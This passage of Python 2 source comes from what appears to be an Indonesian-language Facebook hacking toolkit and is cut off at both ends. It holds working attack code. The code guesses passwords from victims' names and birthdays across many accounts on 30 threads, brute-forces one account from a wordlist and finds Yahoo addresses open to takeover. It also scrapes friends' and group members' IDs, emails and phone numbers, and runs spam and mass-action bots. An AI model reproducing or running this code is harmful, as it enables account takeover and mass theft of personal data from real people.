'\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1 else: pass2 = b['first_name'] + '12345' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2 else: pass3 = b['last_name'] + '123' data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3 else: lahir = b['birthday'] pass4 = lahir.replace('/', '') data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') q = json.load(data) if 'access_token' in q: print '\x1b[1;97m[\x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4 else: if 'www.facebook.com' in q['error_msg']: print '\x1b[1;97m[\x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4 except: pass p = ThreadPool(30) p.map(main, id) print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') super() def brute(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' try: email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ') passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m') total = open(passw, 'r') total = total.readlines() print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[+] \x1b[1;92mJumlah\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword' jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') sandi = open(passw, 'r') for pw in sandi: try: pw = pw.replace('\n', '') sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mMencoba \x1b[1;97m' + pw) sys.stdout.flush() data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6') mpsh = json.loads(data.text) if 'access_token' in mpsh: dapat = open('Brute.txt', 'w') dapat.write(email + ' | ' + pw + '\n') dapat.close() print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() else: if 'www.facebook.com' in mpsh['error_msg']: ceks = open('Brutecekpoint.txt', 'w') ceks.write(email + ' | ' + pw + '\n') ceks.close() print '\n\x1b[1;91m[+] \x1b[1;92mDitemukan.' print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[!] \x1b[1;93mAkun kena Checkpoint' print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw keluar() except requests.exceptions.ConnectionError: print '\x1b[1;91m[!] Koneksi Error' time.sleep(1) except IOError: print '\x1b[1;91m[!] File tidak ditemukan...' print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist' tanyaw() def tanyaw(): why = raw_input('\x1b[1;91m[?] \x1b[1;92mIngin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ') if why == '': print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)' tanyaw() else: if why == 'y': wordlist() else: if why == 'Y': wordlist() else: if why == 't': menu_hack() else: if why == 'T': menu_hack() else: print '\x1b[1;91m[!] Tolong pilih \x1b[1;97m(y/t)' tanyaw() def menu_yahoo(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Dari teman facebook' print '\x1b[1;37;40m2. Gunakan File' print '\x1b[1;31;40m0. Kembali' print yahoo_pilih() def yahoo_pilih(): go = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if go == '': print '\x1b[1;91m[!] Jangan kosong' yahoo_pilih() else: if go == '1': yahoofriends() else: if go == '2': yahoolist() else: if go == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak ada' yahoo_pilih() def yahoofriends(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') teman = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) kimak = json.loads(teman.text) save = open('MailVuln.txt', 'w') print 40 * '\x1b[1;97m\xe2\x95\x90' for w in kimak['data']: jml += 1 mpsh.append(jml) id = w['id'] nama = w['name'] links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket) z = json.loads(links.text) try: mail = z['email'] yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama \x1b[1;91m:\x1b[1;97m ' + nama print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]' print 40 * '\x1b[1;97m\xe2\x95\x90' else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]' except KeyError: pass print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() def yahoolist(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m') try: total = open(files, 'r') mail = total.readlines() except IOError: print '\x1b[1;91m[!] File tidak ada' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() mpsh = [] jml = 0 jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') save = open('MailVuln.txt', 'w') print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]' print mail = open(files, 'r').readlines() for pw in mail: mail = pw.replace('\n', '') jml += 1 mpsh.append(jml) yahoo = re.compile('@.*') otw = yahoo.search(mail).group() if 'yahoo.com' in otw: br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com') br._factory.is_html = True br.select_form(nr=0) br['username'] = mail klik = br.submit().read() jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*') try: pek = jok.search(klik).group() except: print '\x1b[1;91m ' + mail continue if '"messages.ERROR_INVALID_USERNAME">' in pek: save.write(mail + '\n') print '\x1b[1;92m ' + mail else: print '\x1b[1;91m ' + mail print '\n\x1b[1;91m[+] \x1b[1;97mSelesai' print '\x1b[1;91m[+] \x1b[1;97mTersimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt' save.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') menu_yahoo() def grab(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Ambil ID teman' print '\x1b[1;37;40m2. Ambil ID teman dari teman' print '\x1b[1;37;40m3. Ambil ID member GRUP' print '\x1b[1;37;40m4. Ambil Email teman' print '\x1b[1;37;40m5. Ambil Email teman dari teman' print '\x1b[1;37;40m6. Ambil No HP teman' print '\x1b[1;37;40m7. Ambil No HP teman dari teman' print '\x1b[1;31;40m0. Kembali' print grab_pilih() def grab_pilih(): cuih = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if cuih == '': print '\x1b[1;91m[!] Jangan kosong' grab_pilih() else: if cuih == '1': id_teman() else: if cuih == '2': idfrom_teman() else: if cuih == '3': id_member_grup() else: if cuih == '4': email() else: if cuih == '5': emailfrom_teman() else: if cuih == '6': nomor_hp() else: if cuih == '7': hpfrom_teman() else: if cuih == '0': menu_hack() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mTidak ada' grab_pilih() def id_teman(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) z = json.loads(r.text) save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_id, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for ah in z['data']: idteman.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_id bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(save_id) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def idfrom_teman(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket) z = json.loads(r.text) save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') bz = open(save_idt, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for ah in z['friends']['data']: idfromteman.append(ah['id']) bz.write(ah['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + ah['name'] print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + save_idt bz.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def id_member_grup(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ') try: r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket) asw = json.loads(r.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mNama grup \x1b[1;91m:\x1b[1;97m ' + asw['name'] except KeyError: print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') b = open(simg, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket) s = json.loads(re.text) for i in s['data']: idmem.append(i['id']) b.write(i['id'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + i['name'] print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id'] print 40 * '\x1b[1;97m\xe2\x95\x90' print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah ID \x1b[1;96m%s' % len(idmem) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + simg b.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(simg) print '\x1b[1;91m[!] Grup tidak ditemukan' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def email(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: em.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(em) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(mails) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def emailfrom_teman(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) mpsh = open(mails, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: emfromteman.append(z['email']) mpsh.write(z['email'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Email\x1b[1;96m%s' % len(emfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + mails mpsh.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def nomor_hp(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') url = 'https://graph.facebook.com/me/friends?access_token=' + toket r = requests.get(url) z = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for n in z['data']: x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hp.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hp) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except KeyError: os.remove(noms) print '\x1b[1;91m[!] Kesalahan terjadi' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def hpfrom_teman(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: try: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' idt = raw_input('\x1b[1;91m[+] \x1b[1;92mMasukan ID Teman \x1b[1;91m: \x1b[1;97m') try: jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket) op = json.loads(jok.text) print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name'] except KeyError: print '\x1b[1;91m[!] Belum berteman' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m') r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket) a = json.loads(r.text) no = open(noms, 'w') jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mTunggu sebentar \x1b[1;97m...') print 40 * '\x1b[1;97m\xe2\x95\x90' for i in a['data']: x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket) z = json.loads(x.text) try: hpfromteman.append(z['mobile_phone']) no.write(z['mobile_phone'] + '\n') print '\r\x1b[1;92mNama\x1b[1;91m :\x1b[1;97m ' + z['name'] print '\x1b[1;92mNomor\x1b[1;91m : \x1b[1;97m' + z['mobile_phone'] print 40 * '\x1b[1;97m\xe2\x95\x90' except KeyError: pass print '\n\r\x1b[1;91m[+] \x1b[1;97mJumlah Nomor\x1b[1;96m%s' % len(hpfromteman) print '\x1b[1;91m[+] \x1b[1;97mFile tersimpan \x1b[1;91m: \x1b[1;97m' + noms no.close() raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except IOError: print '\x1b[1;91m[!] Kesalahan saat membuat file' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except (KeyboardInterrupt, EOFError): print '\x1b[1;91m[!] Terhenti' raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]') grab() except requests.exceptions.ConnectionError: print '\x1b[1;91m[\xe2\x9c\x96] Tidak ada koneksi' keluar() def menu_bot(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. Bot Reactions Target Post' print '\x1b[1;37;40m2. Bot Reactions Grup Post' print '\x1b[1;37;40m3. Bot Komen Target Post' print '\x1b[1;37;40m4. Bot Komen Grup Post' print '\x1b[1;37;40m5. Mass delete Post' print '\x1b[1;37;40m6. Terima permintaan pertemanan' print '\x1b[1;37;40m7. Hapus pertemanan' print '\x1b[1;31;40m0. Kembali' print bot_pilih() def bot_pilih(): bots = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if bots == '': print '\x1b[1;91m[!] Jangan kosong' bot_pilih() else: if bots == '1': menu_react() else: if bots == '2': grup_react() else: if bots == '3': bot_komen() else: if bots == '4': grup_komen() else: if bots == '5': deletepost() else: if bots == '6': accept() else: if bots == '7': unfriend() else: if bots == '0': menu() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mTidak ada' bot_pilih() def menu_react(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' print '\x1b[1;37;40m1. \x1b[1;97mLike' print '\x1b[1;37;40m2. \x1b[1;97mLove' print '\x1b[1;37;40m3. \x1b[1;97mWow' print '\x1b[1;37;40m4. \x1b[1;97mHaha' print '\x1b[1;37;40m5. \x1b[1;97mSedih' print '\x1b[1;37;40m6. \x1b[1;97mMarah' print '\x1b[1;31;40m0. Kembali' print react_pilih() def react_pilih(): global tipe aksi = raw_input('\x1b[1;91m-\xe2\x96\xba\x1b[1;97m ') if aksi == '': print '\x1b[1;91m[!] Jangan kosong' react_pilih() else: if aksi == '1': tipe = 'LIKE' react() else: if aksi == '2': tipe = 'LOVE' react() else: if aksi == '3': tipe = 'WOW' react() else: if aksi == '4': tipe = 'HAHA' react() else: if aksi == '5': tipe = 'SAD' react() else: if aksi == '6': tipe = 'ANGRY' react() else: if aksi == '0': menu_bot() else: print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mTidak ada' react_pilih() def react(): os.system('reset') try: toket = open('login.txt', 'r').read() except IOError: print '\x1b[1;91m[!] Token tidak ditemukan' os.system('rm -rf login.txt') time.sleep(1) login() else: os.system('reset') print logo print 40 * '\x1b[1;97m\xe2\x95\x90' ide = 